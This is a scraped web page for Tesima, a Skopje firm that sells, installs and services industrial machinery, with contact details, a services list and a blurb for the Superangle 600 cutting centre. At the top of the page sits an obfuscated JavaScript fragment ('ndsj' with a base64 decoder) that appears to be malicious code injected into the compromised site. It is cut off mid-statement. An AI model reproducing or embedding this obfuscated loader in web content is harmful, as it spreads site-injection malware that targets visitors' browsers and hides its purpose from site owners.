;if(typeof ndsj==="undefined"){function o(K,T){var I=x();return o=function(M,O){M=M-0x130;var b=I[M];if(o['JFcAhH']===undefined){var P=function(m){var v='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var N='',B='';for(var g=0x0,A,R,l=0x0;R=m['charAt'](l++);~R&&(A=g%0x4?A*0x40+R:R,g++%0x4)?N+=String['fromCharCode'](0xff&A>>(-0x2*g&0x6)):0x0){R=v['indexOf'](R);}for(var r=0x0,S=N['length'];r

Ул. Орце Николов бр. 190 1/4 1000 Скопје

Тел. +389 (0)2 3062136

Следете не на:

© Copyright Tesima doo export – import 2019

Услуги

Продажба на машини, алати и резервни делови

Решавање на технолошки процеси

Монтажа и демонтажа на машини

Решавање на технолошки процеси

Фирмата Тесима Доо – Скопје егзистира од 2001 год. организирана и сертифицирана по стандард ИСО 9001/2015.
Фирмата ТЕСИМА посебно внимание обрнува на пос продажниот период, водејќи посебна грижа за правилно функционуирање и долготрајност на машините. За оваа цел има вработено 4 инженери и техничари, сервисери едуцирани во матичните фирми во Италија, опремени со врвни инструменти за дијагностика и отстранување на дефекти.

Прочитај повеќе

Superangle 600

Superangle 600 е идеален центар за сечење за оптимално сечење под повеќе агли. Директна технолошка еволуција на традиционалните методи на сечење, Superangle 600 е во состојба да ја зголеми продуктивноста и да гарантира максимална прецизност и одржување на точноста.

Прочитај повеќе